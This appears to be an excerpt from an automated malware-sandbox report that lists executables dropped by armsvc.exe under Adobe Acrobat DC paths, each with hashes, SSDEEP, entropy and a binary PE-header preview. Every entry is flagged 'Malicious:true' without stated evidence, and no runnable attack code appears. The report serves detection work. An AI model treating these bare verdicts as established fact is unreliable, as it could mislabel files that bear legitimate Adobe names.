                                                                                                                                                  Size (bytes):12039168
                                                                                                                                                  Entropy (8bit):6.595653452819305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:98304:Jb+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKt7wRGpj3:FnPgTHIwZnRBk9DdhSUEVIXgKRF9
                                                                                                                                                  MD5:0BB5671DD6F19563D95FC684F7696486
                                                                                                                                                  SHA1:174016145E5405C311D29E2BAAEEDD90135E8429
                                                                                                                                                  SHA-256:7D862CE2F402240C3A09CF7D239941865C96FAFD70B6E94AA98BB5A78B6069A1
                                                                                                                                                  SHA-512:1FA82540E34EA04E32599E98B1A70017BECE22649DBDAFEACE8D77745B84683C51854CBDA63403BDF88307B293ECE4F0F86AA4E5847F419C1735EAA8ABC33B1A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................V.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1478144
                                                                                                                                                  Entropy (8bit):4.826047714317898
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:pg5FvCPcs9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ufHGLNiXicJFFRGNzj3
                                                                                                                                                  MD5:0A186775CF557473E261B32E15556C56
                                                                                                                                                  SHA1:5B6CA554B021C54BC9B9277B6BA525C9FBC0D048
                                                                                                                                                  SHA-256:EC5197558A74088496A04E271AA04B88CE3585E531EBDA28AE29AE1C3E4EF2D9
                                                                                                                                                  SHA-512:5AD8390BFB8C94794C2CD6A84FD441DF1ABC4A968EFEDA16D6EC9CCA5074C4A48EE394B5D0EDCFC61B090BDEF441FE8B8748F626D3DF8E586C944847B25E0182
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!.....O..... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1339904
                                                                                                                                                  Entropy (8bit):7.200171265633495
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:gjKTIsAjFuvt9fmFthMaT5U8aChaeuv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gjI/mPh7TT79OLNiXicJFFRGNzj3
                                                                                                                                                  MD5:447EDF386DCBEFC7BB3C73755F9D244D
                                                                                                                                                  SHA1:49BD27A0E57F8AD3271C91AB05508CEB0FAC2F54
                                                                                                                                                  SHA-256:F18ECAED306B3E02E3F184BB8AAFECA4EAB41908A58592ED2723303A9C25CB0C
                                                                                                                                                  SHA-512:AC63938B0D1F0615E80C508E08D709419E2F66AE5E49250E9AAE8E7EE13A78E55AD35CBA8B17C711AAE7DE9151BBD415E082A651970079E1BAB4D938FF646D27
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....oR.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1671168
                                                                                                                                                  Entropy (8bit):5.004961343913047
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uGqVwCto1Om5WgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:bZ1OmUILNiXicJFFRGNzj3
                                                                                                                                                  MD5:DCBC027CA9E8C526E6EB0DA34DD53ED1
                                                                                                                                                  SHA1:5FDDFB306550304FB4DF88E939F304194C435376
                                                                                                                                                  SHA-256:36976E591D62BDA0BB0CFA60D7D52E7484D76D63E3D4F11C0D31DD76CAE7B843
                                                                                                                                                  SHA-512:8C40AB0C6200A63B221E19F0F805B49DE8D1C24063A69C1733D0E5233D1BF8494D0A266C8F98A68531CA038251F10AF27F36A1AEA179961EC15E235E8A8223B3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$........... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1409024
                                                                                                                                                  Entropy (8bit):4.686406931438888
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:qWBWZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oLNiXicJFFRGNzj3
                                                                                                                                                  MD5:7FF04FFF284749125B6AC03F37A3BC58
                                                                                                                                                  SHA1:6900E3E84072F515060B7BEBFC1BB1AC79E4ED9E
                                                                                                                                                  SHA-256:30D342C90F32CB41725B53E5C53594A7A6055F6B2F83AF7735CDBF4F3248B252
                                                                                                                                                  SHA-512:846DBA4427A610B4AA5E49F633F916FC7521CAC367A22DA1D2C7AD6FB04E26EA4670D9C54C6107D1B3BD06AD327031EF306C4BA6A65B07A880891C81F654C3F8
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p .....1Y.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1683968
                                                                                                                                                  Entropy (8bit):7.221676640034297
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:M+GtCi27mVdyT+a08LNiXicJFFRGNzj3:nmd2757wRGpj3
                                                                                                                                                  MD5:4934B0E60A2C91D278D8D6A553E355EB
                                                                                                                                                  SHA1:8B3F5ABC07C1B94E7D8A41CCDB7D4F08C9F54A55
                                                                                                                                                  SHA-256:758FDA9C897AFB370A24EEB8339527509D05D819F9097B9C4359E7A7C9FFC827
                                                                                                                                                  SHA-512:B56E97044464EBAEF53CA2BF6056B7D55E6EA8BAE9AA7783B73E5F18A7CB86BAB4C8E2528752522AAFAF41341634999A9879042946A37320A7B77F21FCF5C9B2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................2..... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3110912
                                                                                                                                                  Entropy (8bit):6.6468730531563995
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:dU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYzLNiXicJFFRGNzj3:S9NfHOIK5Ns6qR9J7wRGpj3
                                                                                                                                                  MD5:2B9B399931F73C11A631FC2927EE8708
                                                                                                                                                  SHA1:8D8A6810539D2516F88B56875D98FEE1BA5D3454
                                                                                                                                                  SHA-256:64458948814B3779F2C8A1C5C1C2DB226C39BB77E516E5763B98431E9FABE5FE
                                                                                                                                                  SHA-512:97163E36784E1628BB0819C442429E4D5FD0B5785E077D29FCC0F4E6F116B8679A40410FDD680CFBB4987A2201F91F950D4651DBA9F545D1B3E68F23CE74FDDE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......*0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1743872
                                                                                                                                                  Entropy (8bit):5.136837613539101
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:SkIWTUQcyd7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SxKU0LNiXicJFFRGNzj3
                                                                                                                                                  MD5:09F33BBA838E10D79DBE8F075EBCD025
                                                                                                                                                  SHA1:55B66C855BE8ADD22EDEB778685439CC9A220937
                                                                                                                                                  SHA-256:39E8E51D9E4A25425B76851AF0324EE1BC7ED0FA0DD47C06A0882880F3F0666C
                                                                                                                                                  SHA-512:577F5CAA7E7A54652A6C283CADC0A9271C1C645109BBC338D3E24521CF266C3B06B2098538D442F149CC586685DDF35AE4F956077ADC5A117B940C55484F9FCC
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@..............................%........... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...p...@......................@...................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1494016
                                                                                                                                                  Entropy (8bit):4.896118193838053
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uO+qBM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:R+fLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DB3115A619F124BC7CBAA399F176B2C6
                                                                                                                                                  SHA1:6D4A286418A6626A30BAA2EFBE71D019EB080030
                                                                                                                                                  SHA-256:76C989A90A176C86DE7F0AF96D4D1B492D2FE10BBCF8378FB921AF7EA36E6785
                                                                                                                                                  SHA-512:6FB33F6BC022DC9F2E0DDC870A36B37DA84AF1A7B4A7AC2D10030A6A975D86AC04425E500A9A025BECE14B54EFD6FF04A0A9DD6C236C771331D1AA840E4A0B4C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@...........................!....................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1298944
                                                                                                                                                  Entropy (8bit):4.521149518320879
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:SiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:E5E26322F9B578B09CDC8E8DEE068A86
                                                                                                                                                  SHA1:12D7C105118DF5266ECEDED76D529D673C317DE3
                                                                                                                                                  SHA-256:3827A5209D7437CE4C9F1E2A89A9B16321F2983EE218FFB23903A723800AD4BB
                                                                                                                                                  SHA-512:1B9B45232458FB3B79384C7B98E9A61EA8D5D16112128BB508FBADAE69315CFF7CD58CFF4ADBA84F6AA76BD62F35ED4EEDC9269AE1A99D8D17188620FE7CD6A9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................e..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...`...........2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1317376
                                                                                                                                                  Entropy (8bit):4.55083767491033
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:4kiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:n/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:776F1520E05ED22E754CAB1AC4DB789C
                                                                                                                                                  SHA1:4391226DCB71006E952630B42F87631D1CCF6663
                                                                                                                                                  SHA-256:5FE6CFEBEA951A7A9EEBA4F8655E4320AE036F4D659FFA0C57DEFB8A386D49E8
                                                                                                                                                  SHA-512:4F0FF7DB6D6D45977C9DAF702F3D0859D3B9AEDBCAB386D08ED4A5A74F47C15E152209F31B2CD71CAA758DC6BBE33DC37CFC82B9A530F6C3BE0058FFCD4EDC0B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@......................................... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...`...........z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                  Entropy (8bit):6.496759755138488
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:9tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN7559LNiXico:9jEIa3HIEWOc5T7wRGpj3
                                                                                                                                                  MD5:C1B8662F8E5D3A6D1B0A0FBB4902D856
                                                                                                                                                  SHA1:EFC3437A7154810E5892E02AEEFEED623133272C
                                                                                                                                                  SHA-256:1A051B96AAF4E1787A6EA5348148B990806D8676CA657374344BB854031E941E
                                                                                                                                                  SHA-512:97B80B7CC862495CD8C581C7916E13368A522D33E4BFC354C597AAE20DAC781F1FB9B84E6A9537E009304853F34E083AFF8A740B4D0E476DCE196E41D9D93FDB
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....c @... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                  Entropy (8bit):7.999353919407271
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1572864:xQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:iXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                  MD5:81E5B3991BCC82926EE45571AD5CCCF3
                                                                                                                                                  SHA1:7A9C944B9D31287EA721E85D0E6C02FA419B6F50
                                                                                                                                                  SHA-256:32C07AF8610E043BD05BF98FF4C4694C3E30D75A554BF0CC65CB23A116113490
                                                                                                                                                  SHA-512:4216FE15A3AB138B79F9C0502E853CC4EDAAE0FE1527B66905C987FAA5EF95B8B56A02A7F13966D0AE087EDF37BCD8FB3E43B2FF67899907952DFB63B499E50B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1385984
                                                                                                                                                  Entropy (8bit):4.703444947922468
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:WjkYuY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:e/uYLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DB654B602A1E6417F51C3C1A058F1B38
                                                                                                                                                  SHA1:CF720B1E4082AD306E66375A6C153C843CD64706
                                                                                                                                                  SHA-256:FF4FB74473017D21BE9F5632F701F3F7886B05E779BF3C71F17493315018856F
                                                                                                                                                  SHA-512:47A4B7A0E472079FBBAA409E6AC52D8C6C058A8F8E91FCCA505E9730D8E985F9D2644D03A9A9BF60FA31741BAB411FFDAAC6F936B6DB44CEFBAEB6F6EBF60BF7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... ......`.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1540608
                                                                                                                                                  Entropy (8bit):4.935002381096148
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:yxwSJzkrmZsE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yyIkrKsELNiXicJFFRGNzj3
                                                                                                                                                  MD5:FDA2B78DF59DE59D497FB22336CF3527
                                                                                                                                                  SHA1:8D5DADD5C0B9FB0DDBE40F08658653F852336FFB
                                                                                                                                                  SHA-256:A2AA1E705434DF09A538C1A96DBEF025319DC924548C21C245F88CEFF4FE489B
                                                                                                                                                  SHA-512:7D7BCC03CA1A36BE9CE36FC03E9212C2D681FFFDCDD79030789077BABA834E7D588AE5881F6E39231AA39BBBF5CE2241450185A311632DBAF6FEBBBCBB980478
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................".....B=.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1804800
                                                                                                                                                  Entropy (8bit):5.247481061981319
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ZHQJLIRZvsnNR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZHQJLy4RLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1F876C371DED28E130A378424B77D745
                                                                                                                                                  SHA1:DEAE8999775989D286554DDB40A5A2021FE2D8AD
                                                                                                                                                  SHA-256:2F76D7374A42E860F6A642BD51B984EB11AFC815353C00DD2805FBA187B755A8
                                                                                                                                                  SHA-512:EC1EC063BCE043AA37F1F7915D59215250DE63E6C057C116A94D68B0ACD9BDB187128743AFC5784504F1A59EBF8E7200CA3F872ADB1AE01BD135807CA91C324B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&.....1c.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5365760
                                                                                                                                                  Entropy (8bit):6.447938137266422
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:TUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kx:IWmXL6DE97dRpKuoQbgC7wRGpj3
                                                                                                                                                  MD5:04CCEF8AF012D0BBE58B0637DADE3682
                                                                                                                                                  SHA1:3297FF0F92049346F10062A8509E45744BEF9EAB
                                                                                                                                                  SHA-256:43710806CBE5CE01BB2D42D260DCF385D48A203FD38C8B7801314AE57AC600DE
                                                                                                                                                  SHA-512:2F3B6B8F2325EEDDCE19C5F6141DEE80A52808FF2F17F5F40E1B331C3B11DD3BB5912F83320667FD35DB266146378FAF4BA9525202F90B307384882D86FA9915
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......Q..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

